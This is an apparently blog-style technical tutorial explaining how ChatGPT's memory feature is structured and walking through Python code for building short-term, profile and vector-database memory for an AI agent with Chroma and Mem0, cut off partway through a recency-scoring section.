The doctor does not remember ever meeting you, but before you walk in, the nurse hands over a file that reads: <em>"Patient is allergic to penicillin, broke their right arm last year, likes to ask about medication side effects…"</em></p><p>The doctor reads that file → talks to you as if you had known each other for years.</p><p><strong>ChatGPT Memory works exactly the same way.</strong></p><p>Before the model receives your message, the system has already loaded a bundle of context about you into its <strong>system prompt</strong>. Specifically, it has 3 parts:</p><ul><li><strong>Model Set Context</strong>: Stable facts about you (name, occupation, interests…)</li><li><strong>Assistant Response Preferences</strong>: How you like to be answered (concise, with code, with practical examples…)</li><li><strong>Recent Conversation Content</strong>: Summaries of relevant recent conversations</li></ul><p>→ The model "remembers" because it <strong>reads your file</strong>, not because it actually has long-term memory.</p><p>This is why you can view and delete individual memories under Settings → Personalization → Memory: they are just text stored in a database, not something mysterious inside the model's "brain".</p><hr><h1 id="2-ki-n-tr-c-4-l-p-b-n-trong"><strong>2. 
The internal 4-layer architecture</strong></h1><p>At a high level, the memory system of ChatGPT (and similar AI assistants) consists of <strong>4 main layers</strong>:</p><figure class="kg-card kg-image-card"></figure><h3 id="l-p-1-user-interface-layer"><strong>Layer 1: User Interface Layer</strong></h3><p>The part users can see and interact with:</p><ul><li>A screen for managing memories (view, edit, or delete individual items)</li><li>A toggle that turns the whole Memory feature on or off</li><li><strong>Temporary Chat</strong> mode: a chat that saves nothing, like a browser's incognito mode</li></ul><p>OpenAI designed this layer carefully so that users always stay in control.</p><h3 id="l-p-2-memory-processing-engine"><strong>Layer 2: Memory Processing Engine</strong></h3><p>This is the "processing brain", the most complex and least discussed part:</p><ul><li><strong>Extraction</strong>: After each conversation, a small LLM (the extraction model) rereads the whole conversation and extracts the information worth keeping. For example, from a conversation about the app you are building, it extracts <em>"User is using Next.js 14 App Router, deploying on Vercel"</em></li><li><strong>Deduplication</strong>: If new information matches an existing memory, the engine merges or updates it instead of creating a duplicate.</li><li><strong>Conflict Resolution</strong>: You once said you use Vue, and today you say you use React, so the engine has to resolve the contradiction. 
A common approach: the newer memory usually overrides the older one, but the two can also be merged into <em>"User switched from Vue to React"</em>.</li><li><strong>Indexing</strong>: Creates a vector embedding for each memory to support semantic search later.</li></ul><h3 id="l-p-3-storage-layer"><strong>Layer 3: Storage Layer</strong></h3><p>Where the data actually lives: not a single database, but several kinds of storage, each serving a specific purpose:</p><!--kg-card-begin: html--><table style="box-sizing: border-box; border-collapse: collapse; margin-bottom: 0px; margin-top: 1em; display: block; width: 700px; overflow: auto; color: rgb(27, 27, 27); font-family: "Open Sans", -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 18px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(255, 255, 255); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><thead style="box-sizing: border-box;"><tr style="box-sizing: border-box;"><th style="box-sizing: border-box; text-align: -webkit-match-parent; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Storage Type</th><th style="box-sizing: border-box; text-align: -webkit-match-parent; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Used for</th><th style="box-sizing: border-box; text-align: -webkit-match-parent; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Example</th></tr></thead><tbody style="box-sizing: border-box;"><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><strong style="box-sizing: 
border-box; font-weight: bolder;">Relational DB</strong><span> </span>(PostgreSQL)</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">User profile, preferences</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><code style="box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Ubuntu Mono", "Liberation Mono", Menlo, Courier, monospace; font-size: 1em; color: inherit; overflow-wrap: break-word; padding: 3px 5px; border-radius: 2px; background-color: rgb(238, 238, 238);">user_id, language, timezone</code></td></tr><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><strong style="box-sizing: border-box; font-weight: bolder;">Vector DB</strong><span> </span>(Pinecone, Weaviate)</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Episodic memories, semantic search</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Embeddings of conversation summaries</td></tr><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><strong style="box-sizing: border-box; font-weight: bolder;">Key-Value Store</strong><span> </span>(Redis)</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Session cache, active context</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">The 5-10 most recent messages</td></tr><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><strong style="box-sizing: border-box; font-weight: 
bolder;">Object Storage</strong><span> </span>(S3)</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Long-term archives</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Full conversation history (compressed)</td></tr></tbody></table><!--kg-card-end: html--><h3 id="l-p-4-llm-integration-layer"><strong>Layer 4: LLM Integration Layer</strong></h3><p>The layer that injects memory into the prompt context before it is sent to the model. This is where the system decides <strong>which memories are selected</strong> for the current context.</p><blockquote>This is the most important layer: because the context window is limited, you cannot stuff every memory into it. You need a <strong>smart selection</strong> mechanism that only picks the memories <em>most relevant</em> to the user's current question.</blockquote><p>This selection usually combines:</p><ul><li><strong>Semantic similarity</strong> (cosine similarity between embeddings): which memories are about topics close to the current question?</li><li><strong>Recency weight</strong>: recent memories are prioritized over old ones</li><li><strong>Explicit keyword match</strong>: when the user mentions a specific project name or tool name</li></ul><hr><h1 id="3-4-lo-i-memory-kh-ng-ph-i-t-t-c-u-gi-ng-nhau"><strong>3. The 4 types of memory: they are not all the same</strong></h1><p>This is where many people get confused. Memory is not a single, uniform concept. 
There are <strong>4 distinct types</strong>, each with its own storage, query pattern, and lifecycle:</p><figure class="kg-card kg-image-card"></figure><h3 id="lo-i-1-user-profile-memory-persistent-facts-"><strong>Type 1: User Profile Memory (Persistent Facts)</strong></h3><p><strong>Analogy:</strong> This is like the personal file in the doctor's drawer: stable information that rarely changes but matters a lot for personalization.</p><ul><li><strong>Stored in</strong>: A structured database (SQL, key-value)</li><li><strong>Example content</strong>: name, occupation, favorite stack, timezone, preferred language, response-style preference (concise vs. detailed)</li><li><strong>Lifetime</strong>: Indefinite; it persists until the user explicitly deletes it</li><li><strong>Updated when</strong>: Clear new information appears, or it conflicts with older information</li></ul><p>In ChatGPT, this is what you see under Settings → Personalization → Manage Memories. Each item is one "fact" about you.</p><h3 id="lo-i-2-conversation-history-episodic-memory-"><strong>Type 2: Conversation History (Episodic Memory)</strong></h3><p><strong>Analogy:</strong> Like a diary: it records exactly what happened, in chronological order, with timestamps and context.</p><p>This type of memory matters because it lets the agent recall past events: <em>"Last week the user and I discussed a JWT expiration problem; is that related to today's question?"</em></p><ul><li><strong>Stored in</strong>: A vector database (for semantic search)</li><li><strong>Example</strong>: <em>"On March 20, the user asked about a Docker networking issue and I suggested using an overlay network"</em>, <em>"On March 22, the user reported that the overlay network works; ticket closed"</em></li><li><strong>Lifetime</strong>: Indefinite, with optional archiving (moved to cold storage after 6 months)</li><li><strong>Query</strong>: Semantic similarity combined with timestamp filtering</li></ul><blockquote>ChatGPT currently includes roughly the <strong>40 most recent entries</strong> in the prompt. 
The rest is still stored but has to be retrieved explicitly when there is a strong enough semantic match.</blockquote><p>This is why ChatGPT can remember <em>"You are building an HR management SaaS"</em> even though you mentioned it 3 weeks ago: the episodic memory of that statement is still in the vector DB, and when you ask a related question, the retrieval engine finds it.</p><h3 id="lo-i-3-extracted-knowledge-semantic-memory-"><strong>Type 3: Extracted Knowledge (Semantic Memory)</strong></h3><p><strong>Analogy:</strong> Like a good student's summary notes: not a verbatim copy of the lecture, but the key insights distilled into a structured, easy-to-search form.</p><p>This is the output of the <strong>information extraction</strong> step applied to the Conversation History. Instead of storing a 50-message conversation verbatim, the engine extracts:</p><p><em>"User is building a B2B HR management SaaS, tech stack: Next.js 14 App Router + Supabase + Tailwind, deployed on Vercel, prefers Server Components, avoids client-side fetching when it is not needed."</em></p><p>Just a few lines, yet enough context to personalize responses.</p><ul><li><strong>Stored in</strong>: Hybrid (structured + vector), enabling both semantic search and exact filtering</li><li><strong>Lifecycle</strong>: Updated and merged as new information arrives. For example, if you later say <em>"I just moved from Supabase to PlanetScale"</em>, the engine updates the memory instead of creating a duplicate</li><li><strong>Characteristics</strong>: This is the most "refined" type of memory: not raw data but <strong>curated knowledge</strong> about the user</li></ul><h3 id="lo-i-4-active-context-working-memory-"><strong>Type 4: Active Context (Working Memory)</strong></h3><p><strong>Analogy:</strong> Like a computer's RAM: extremely fast and accessible, but it only exists while the machine is running. 
Turn the machine off and it is gone.</p><p>This is what AI practitioners usually call <strong>"in-context memory"</strong>: the entire current conversation sitting inside the model's context window.</p><ul><li><strong>Stored in</strong>: The prompt buffer (directly in the context window)</li><li><strong>Example</strong>: The 5–10 most recent messages in the current session</li><li><strong>Lifetime</strong>: Session only; when the session ends, anything worth keeping is flushed to Episodic Memory and the rest is discarded</li><li><strong>Access speed</strong>: Instant, because the model reads it directly with no retrieval step</li></ul><blockquote><strong>How the 4 types relate:</strong> Active Context → session ends → flushed to Conversation History → extraction engine runs → produces Extracted Knowledge → updates the User Profile (if something important changed). This is the memory lifecycle.</blockquote><hr><h1 id="4-lu-ng-ho-t-ng-khi-b-n-g-i-m-t-tin-nh-n"><strong>4. What happens when you send a message</strong></h1><p>Let me trace it step by step. Suppose you type: <em>"Today I want to refactor the authentication module"</em></p><figure class="kg-card kg-image-card"></figure><p><strong>The most important step</strong> is the <strong>Retrieval Phase</strong>: the system searches for the memories <em>most relevant</em> to the current question instead of stuffing everything in.</p><p>The whole flow takes a few hundred milliseconds, which is why responses stay fast even with the extra database queries.</p><p><strong>An interesting detail about Conflict Detection:</strong></p><p>Before putting memories into the context, the system has to check whether they contradict each other. For example, memory A says <em>"Uses Pages Router"</em> and memory B says <em>"Uses App Router"</em>; if both go into the context, the model gets confused.</p><p>A common solution is <strong>timestamp-based resolution</strong>: the newer memory wins, and the older one is marked as deprecated or deleted.</p><hr><h1 id="5-t-build-memory-system-cho-agent-c-a-b-n"><strong>5. 
Building a Memory System for Your Own Agent</strong></h1><p>The most fun part. I will walk through a <strong>3-tier architecture</strong>: the simplest design that is still powerful enough for most use cases.</p><figure class="kg-card kg-image-card"></figure><h3 id="tier-1-short-term-context-memory-c-i-n-gi-n-nh-t"><strong>Tier 1: Short-Term Context Memory, the simplest tier</strong></h3><p>Just a list of messages kept for the session, trimmed automatically when it exceeds a limit:</p><pre><code class="language-python"># short_term_memory.py
conversation_history = []
MAX_HISTORY = 10

def add_message(role: str, content: str):
    """Append a message to short-term memory"""
    conversation_history.append({
        "role": role,
        "content": content
    })
    # Trim when over the limit by dropping the oldest message
    if len(conversation_history) > MAX_HISTORY:
        conversation_history.pop(0)

def get_history() -> list:
    return conversation_history

def clear_history():
    conversation_history.clear()
</code></pre><p>Use it for: immediate context within the current session. No database and no embeddings are needed; it is the simplest option, yet effective for ordinary chat.</p><h3 id="tier-2-user-profile-memory-d-li-u-ng-i-d-ng-l-u-d-i"><strong>Tier 2: User Profile Memory, long-lived user data</strong></h3><p>Stored in a structured database. For a prototype, SQLite or even a JSON file is enough:</p><pre><code class="language-python"># user_profile.py
import json
import os
from datetime import datetime

PROFILE_DB_PATH = "user_profiles.json"

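def load_profiles() -> dict:
    if os.path.exists(PROFILE_DB_PATH):
        # Explicit UTF-8 so non-ASCII values (e.g. Vietnamese) round-trip correctly
        with open(PROFILE_DB_PATH, "r", encoding="utf-8") as f:
            return json.load(f)
    return {}

def save_profiles(profiles: dict):
    with open(PROFILE_DB_PATH, "w", encoding="utf-8") as f:
        json.dump(profiles, f, indent=2, ensure_ascii=False)

def get_user_profile(user_id: str) -> dict:
    profiles = load_profiles()
    return profiles.get(user_id, {})

def deep_merge(base: dict, updates: dict) -> dict:
    """Recursively merge updates into base; nested dicts are merged, not replaced"""
    for key, value in updates.items():
        if isinstance(value, dict) and isinstance(base.get(key), dict):
            deep_merge(base[key], value)
        else:
            base[key] = value
    return base

def update_user_profile(user_id: str, updates: dict):
    """Update the profile by merging into the existing data"""
    profiles = load_profiles()
    if user_id not in profiles:
        profiles[user_id] = {"created_at": datetime.now().isoformat()}

    # dict.update() would replace the whole nested "preferences" dict;
    # deep_merge keeps the keys that are not being updated
    deep_merge(profiles[user_id], updates)
    profiles[user_id]["updated_at"] = datetime.now().isoformat()
    save_profiles(profiles)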

# Example usage
update_user_profile("user_123", {
    "preferences": {
        "language": "Vietnamese",
        "programming_language": "TypeScript",
        "framework": "Next.js",
        "response_style": "concise_with_examples"
    },
    "facts": {
        "role": "Backend Developer",
        "project": "HR SaaS startup",
        "timezone": "Asia/Ho_Chi_Minh"
    }
})
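
# Sketch (hypothetical helper, not part of any library): render a stored
# profile as a plain-text block to prepend to the system prompt, similar in
# spirit to the "Model Set Context" section described earlier. Only the
# "facts" and "preferences" sections are rendered; timestamps are skipped.
def format_profile_for_prompt(profile: dict) -> str:
    lines = ["User profile:"]
    for section in ("facts", "preferences"):
        for key, value in profile.get(section, {}).items():
            lines.append(f"- {key}: {value}")
    return "\n".join(lines)

# e.g. format_profile_for_prompt(get_user_profile("user_123"))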
</code></pre><p>In production, replace the JSON file with PostgreSQL or MongoDB. The schema stays similar; only the storage layer changes.</p><h3 id="tier-3-episodic-long-term-memory-v-i-vector-database"><strong>Tier 3: Episodic Long-Term Memory with a Vector Database</strong></h3><p>This is the most important part if you want the agent to "remember" long-term. You need a <strong>vector database</strong> to store memories and search them by semantic similarity.</p><p><strong>Comparing 4 popular options:</strong></p><!--kg-card-begin: html--><table style="box-sizing: border-box; border-collapse: collapse; margin-bottom: 0px; margin-top: 1em; display: block; width: 700px; overflow: auto; color: rgb(27, 27, 27); font-family: "Open Sans", -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 18px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(255, 255, 255); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><thead style="box-sizing: border-box;"><tr style="box-sizing: border-box;"><th style="box-sizing: border-box; text-align: -webkit-match-parent; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Vector DB</th><th style="box-sizing: border-box; text-align: -webkit-match-parent; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Pros</th><th style="box-sizing: border-box; text-align: -webkit-match-parent; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Cons</th><th style="box-sizing: border-box; text-align: -webkit-match-parent; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Best for</th></tr></thead><tbody style="box-sizing: 
border-box;"><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><strong style="box-sizing: border-box; font-weight: bolder;">Chroma</strong></td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Lightweight, local, zero setup, free</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Does not scale well</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Prototypes, local development</td></tr><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><strong style="box-sizing: border-box; font-weight: bolder;">Pinecone</strong></td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Managed cloud service, highly scalable, low latency, simple API</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Expensive at large scale</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Production apps</td></tr><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><strong style="box-sizing: border-box; font-weight: bolder;">Weaviate</strong></td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Open-source, self-hosted, GraphQL API, hybrid search</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">More complex setup</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: 
top;">Enterprise, self-hosting</td></tr><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><strong style="box-sizing: border-box; font-weight: bolder;">Qdrant</strong></td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Open-source, Rust performance, powerful filtering</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Smaller ecosystem</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Performance-critical</td></tr></tbody></table><!--kg-card-end: html--><p><strong>Implementation with Chroma (the fastest way to get started):</strong></p><pre><code class="language-python"># episodic_memory.py
import chromadb
from datetime import datetime
from openai import OpenAI

# Chroma client: runs locally, no server needed (in-memory by default;
# chromadb.PersistentClient(path=...) keeps the data on disk)
chroma_client = chromadb.Client()
collection = chroma_client.get_or_create_collection(
    name="episodic_memories",
    metadata={"hnsw:space": "cosine"}  # Use cosine distance for similarity search
)

openai_client = OpenAI()

def get_embedding(text: str) -> list:
    """Create an embedding for a text using OpenAI"""
    response = openai_client.embeddings.create(
        input=text,
        model="text-embedding-3-small"  # 1536 dimensions, cheap and good quality
    )
    return response.data[0].embedding

def save_episodic_memory(
    user_id: str,
    content: str,
    metadata: dict | None = None
) -> str:
    """Save a new memory to the vector DB"""
    embedding = get_embedding(content)
    now = datetime.now()
    memory_id = f"{user_id}_{now.timestamp()}"
    
    collection.add(
        documents=[content],
        embeddings=[embedding],
        metadatas=[{
            "topic": "general",
            **(metadata or {}),  # Caller metadata may override "topic"...
            "user_id": user_id,  # ...but never user_id or timestamp
            "timestamp": now.isoformat(),
        }],
        ids=[memory_id]
    )
    return memory_id

def search_relevant_memories(
    user_id: str,
    query: str,
    n_results: int = 5
) -> list[dict]:
    """Find the top-N memories most relevant to the query"""
    query_embedding = get_embedding(query)
    
    results = collection.query(
        query_embeddings=[query_embedding],
        n_results=n_results,
        where={"user_id": user_id},  # Filter by user: important!
        include=["documents", "metadatas", "distances"]
    )
    
    if not results["documents"][0]:
        return []
    
    # Return the memories sorted by relevance (Chroma returns the nearest first)
    memories = []
    for doc, meta, dist in zip(
        results["documents"][0],
        results["metadatas"][0],
        results["distances"][0]
    ):
        memories.append({
            "content": doc,
            "timestamp": meta.get("timestamp"),
            "relevance_score": 1 - dist  # Convert cosine distance → similarity score
        })
    
    return memories

def delete_user_memories(user_id: str):
    """Delete all of a user's memories (for privacy control)"""
    results = collection.get(where={"user_id": user_id})
    if results["ids"]:
        collection.delete(ids=results["ids"])
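
# Why `1 - dist` in search_relevant_memories(): a stdlib-only illustration.
# The helper names below are hypothetical, not part of Chroma's API.
# With "hnsw:space": "cosine", Chroma reports a cosine *distance*, defined as
# 1 - cosine similarity, so subtracting it from 1 recovers the similarity.
import math

def cosine_similarity(a: list[float], b: list[float]) -> float:
    dot = sum(x * y for x, y in zip(a, b))
    norms = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norms

def cosine_distance(a: list[float], b: list[float]) -> float:
    return 1.0 - cosine_similarity(a, b)

query = [1.0, 1.0]
same_direction = [3.0, 3.0]  # Parallel to the query: distance 0, similarity 1
orthogonal = [1.0, -1.0]     # Unrelated direction: distance 1, similarity 0
for vec in (same_direction, orthogonal):
    dist = cosine_distance(query, vec)
    print(f"distance={dist:.2f} similarity={1 - dist:.2f}")
# distance=0.00 similarity=1.00
# distance=1.00 similarity=0.00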
</code></pre><hr><h1 id="6-d-ng-mem0-th-vi-n-memory-all-in-one"><strong>6. Using Mem0: an all-in-one memory library</strong></h1><p>If you don't want to build everything from scratch, <strong>Mem0</strong> is an excellent choice. It wraps all three tiers above in one simple interface and adds automatic conflict resolution and deduplication:</p><pre><code class="language-bash">pip install mem0ai
</code></pre><p><strong>Basic configuration with OpenAI + Chroma (local):</strong></p><pre><code class="language-python"># mem0_basic.py
from mem0 import Memory

# Simplest config: OpenAI embeddings, local Chroma
config = {
    "llm": {
        "provider": "openai",
        "config": {
            "model": "gpt-4o-mini",
            "api_key": "your-openai-api-key"
        }
    },
    "embedder": {
        "provider": "openai",
        "config": {
            "model": "text-embedding-3-small"
        }
    },
    "vector_store": {
        "provider": "chroma",
        "config": {
            "collection_name": "agent_memories",
            "path": "./chroma_db"  # Local storage
        }
    }
}

m = Memory.from_config(config)

# Save memories from a conversation
messages = [
    {"role": "user", "content": "I'm building a SaaS with Next.js and Supabase"},
    {"role": "assistant", "content": "Nice! Are you using the App Router or the Pages Router?"},
    {"role": "user", "content": "App Router, and I prefer Server Components"},
]
result = m.add(messages, user_id="user_123")
print(result)
# Example output (LLM-generated, so the exact wording will vary):
# → {'results': [{'memory': 'User is building a SaaS with Next.js App Router + Supabase, prefers Server Components', 'event': 'ADD'}]}
# Mem0 extracts the insight from the conversation by itself, no manual work needed!

# Search related memories
relevant = m.search(query="Next.js setup and deployment", user_id="user_123")
for mem in relevant["results"]:
    print(f"Memory: {mem['memory']}")
    print(f"Score: {mem['score']:.3f}")
# Example output (wording and score will vary):
# → Memory: User is building a SaaS with Next.js App Router + Supabase, prefers Server Components
# → Score: 0.892
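
# A context-budget helper for Mem0 search responses: a hard cap plus a relevance threshold.
# select_memories is a hypothetical helper, not part of Mem0. It assumes the
# {"results": [{"memory": ..., "score": ...}]} shape used above and that a higher
# score means more relevant; check how your vector store reports scores.
def select_memories(search_response: dict, min_score: float = 0.7, max_items: int = 5) -> list[str]:
    """Keep memories scoring above min_score, best first, at most max_items of them."""
    relevant = [
        r for r in search_response.get("results", [])
        if r.get("score", 0.0) > min_score
    ]
    relevant.sort(key=lambda r: r["score"], reverse=True)
    return [r["memory"] for r in relevant[:max_items]]

sample_response = {"results": [
    {"memory": "Uses Next.js App Router", "score": 0.89},
    {"memory": "Asked about the weather once", "score": 0.41},
    {"memory": "Database is Supabase", "score": 0.76},
]}
print(select_memories(sample_response))
# ['Uses Next.js App Router', 'Database is Supabase']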
</code></pre><p><strong>Production config with Pinecone:</strong></p><pre><code class="language-python"># mem0_production.py
from mem0 import Memory

config = {
    "llm": {
        "provider": "openai",
        "config": {
            "model": "gpt-4o-mini",
            "api_key": "your-openai-api-key"
        }
    },
    "embedder": {
        "provider": "openai",
        "config": {
            "model": "text-embedding-3-small"
        }
    },
    "vector_store": {
        "provider": "pinecone",
        "config": {
            "api_key": "your-pinecone-api-key",
            "index_name": "agent-memory-prod",
            "dimension": 1536,
            "metric": "cosine",
            "spec": {
                "serverless": {
                    "cloud": "aws",
                    "region": "us-east-1"
                }
            }
        }
    },
    # Add a graph store if you want relationship-based memory
    "graph_store": {
        "provider": "neo4j",
        "config": {
            "url": "bolt://localhost:7687",
            "username": "neo4j",
            "password": "your-password"
        }
    }
}

m = Memory.from_config(config)
</code></pre><p><strong>Key Mem0 operations:</strong></p><pre><code class="language-python"># Add memories
m.add(messages, user_id="user_123")

# Search
results = m.search("deployment setup", user_id="user_123", limit=5)

# View all of a user's memories
all_memories = m.get_all(user_id="user_123")

# Update a specific memory
m.update(memory_id="abc123", data="User switched from Supabase to PlanetScale")

# Delete a single memory
m.delete(memory_id="abc123")

# Delete all of a user's memories (important for privacy!)
m.delete_all(user_id="user_123")

# Memory history: see how a memory changed over time
history = m.history(memory_id="abc123")
</code></pre><hr><h1 id="7-t-ch-h-p-v-o-agent-pipeline-ho-n-ch-nh"><strong>7. Integrating into a complete agent pipeline</strong></h1><p>Now let's put everything together into an agent that actually has memory:</p><pre><code class="language-python"># memory_agent.py
from collections import defaultdict, deque

from mem0 import Memory
from openai import OpenAI
from user_profile import get_user_profile, update_user_profile  # Profile helpers from the earlier section

# Initialize
mem0 = Memory.from_config(config)  # `config` is the Mem0 config from the section above
openai_client = OpenAI()

# Short-term memory: keep the 10 most recent messages, separately for each user
MAX_SESSION_HISTORY = 10
session_histories: dict[str, deque] = defaultdict(lambda: deque(maxlen=MAX_SESSION_HISTORY))

def build_system_prompt(user_id: str, user_query: str) -> str:
    """Build a system prompt that carries the full memory context"""
    
    # 1. Load the user profile
    profile = get_user_profile(user_id)
    profile_text = ""
    if profile:
        prefs = profile.get("preferences", {})
        facts = profile.get("facts", {})
        profile_text = f"""
About the user:
- Role: {facts.get('role', 'Unknown')}
- Tech stack: {prefs.get('programming_language', 'Unknown')} / {prefs.get('framework', 'Unknown')}
- Project: {facts.get('project', 'Unknown')}
- Response style: {prefs.get('response_style', 'balanced')}
"""
    
    # 2. Search episodic memories related to the current query
    relevant_memories = mem0.search(
        query=user_query,
        user_id=user_id,
        limit=5  # Top-5 only, to avoid overloading the context
    )
    
    # Keep only memories that are relevant enough (filter first, so the
    # header is only added when at least one memory passes the threshold)
    relevant = [mem for mem in relevant_memories["results"] if mem.get("score", 0) > 0.7]
    memories_text = ""
    if relevant:
        memories_text = "\nWhat you know about the user from previous conversations:\n"
        for mem in relevant:
            memories_text += f"- {mem['memory']}\n"
    
    system_prompt = f"""You are a smart AI assistant that always remembers context about the user.
{profile_text}
{memories_text}
Use the context above to give personalized, consistent answers.
Don't ask again for information you already know about the user.
"""
    return system_prompt

def chat_with_memory(user_id: str, user_message: str) -> str:
    """Main chat function with full memory support"""
    history = session_histories[user_id]
    
    # 1. Add the user message to this user's session history
    #    (the deque drops the oldest message automatically once full)
    history.append({"role": "user", "content": user_message})
    
    # 2. Build the system prompt with memories
    system_prompt = build_system_prompt(user_id, user_message)
    
    # 3. Call the LLM with the full context
    messages = [{"role": "system", "content": system_prompt}] + list(history)
    
    response = openai_client.chat.completions.create(
        model="gpt-4o",
        messages=messages,
        temperature=0.7
    )
    assistant_response = response.choices[0].message.content
    
    # 4. Add the response to the session history
    history.append({"role": "assistant", "content": assistant_response})
    
    # 5. Save the exchange to long-term memory (better done asynchronously)
    mem0.add(
        messages=[
            {"role": "user", "content": user_message},
            {"role": "assistant", "content": assistant_response}
        ],
        user_id=user_id
    )
    
    # 6. Extract and update the profile if there is new info
    _auto_update_profile(user_id, user_message)
    
    return assistant_response

def _auto_update_profile(user_id: str, user_message: str):
    """Detect and update profile fields from a message"""
    # Simple keyword heuristics; production should use an LLM to extract them
    message_lower = user_message.lower()
    
    updates = {}
    if "typescript" in message_lower or " ts " in message_lower:
        updates["programming_language"] = "TypeScript"
    if "next.js" in message_lower or "nextjs" in message_lower:
        updates["framework"] = "Next.js"
    elif "react" in message_lower and "native" not in message_lower:
        updates["framework"] = "React"  # elif: don't overwrite Next.js, which is built on React
    
    if updates:
        current = get_user_profile(user_id) or {}  # The profile may not exist yet
        prefs = current.get("preferences", {})
        prefs.update(updates)
        update_user_profile(user_id, {"preferences": prefs})


# ============================================================
# Usage demo
# ============================================================

if __name__ == "__main__":
    user_id = "user_123"
    
    # Turn 1: introduce the project
    response1 = chat_with_memory(
        user_id,
        "I'm building an HR management app with Next.js 14 and Supabase"
    )
    print("Response 1:", response1[:200])
    
    # Turn 2: a question about auth (the agent should remember the context from turn 1)
    response2 = chat_with_memory(
        user_id,
        "What's the best way to implement authentication?"
    )
    print("Response 2:", response2[:200])
    # Knowing you use Next.js + Supabase, the agent can recommend Supabase Auth instead of a generic answer
    
    print("\n--- Stored memories: ---")
    all_mems = mem0.get_all(user_id=user_id)
    for mem in all_mems["results"]:
        print(f"  • {mem['memory']}")
</code></pre><hr><h1 id="8-recency-relevance-scoring-b-quy-t-ch-n-ng-memory"><strong>8. Recency + Relevance Scoring: the secret to choosing the right memories</strong></h1><p>Not every memory is equally important. A memory from last week on the same topic is more relevant than a memory from six months ago on a different topic. You need to combine <strong>semantic similarity</strong> and <strong>recency decay</strong>:</p><pre><code class="language-python"># memory_scorer.py
import math
from datetime import datetime, timezone

def compute_recency_weight(
    memory_timestamp: str,
    decay_rate: float = 0.1,
    now: datetime | None = None
) -> float:
    """
    Compute a recency weight with exponential decay: exp(-decay_rate * days_ago).
    The older the memory, the lower the weight.
    decay_rate = 0.1 gives a half-life of ln(2) / 0.1 ≈ 6.9 days.
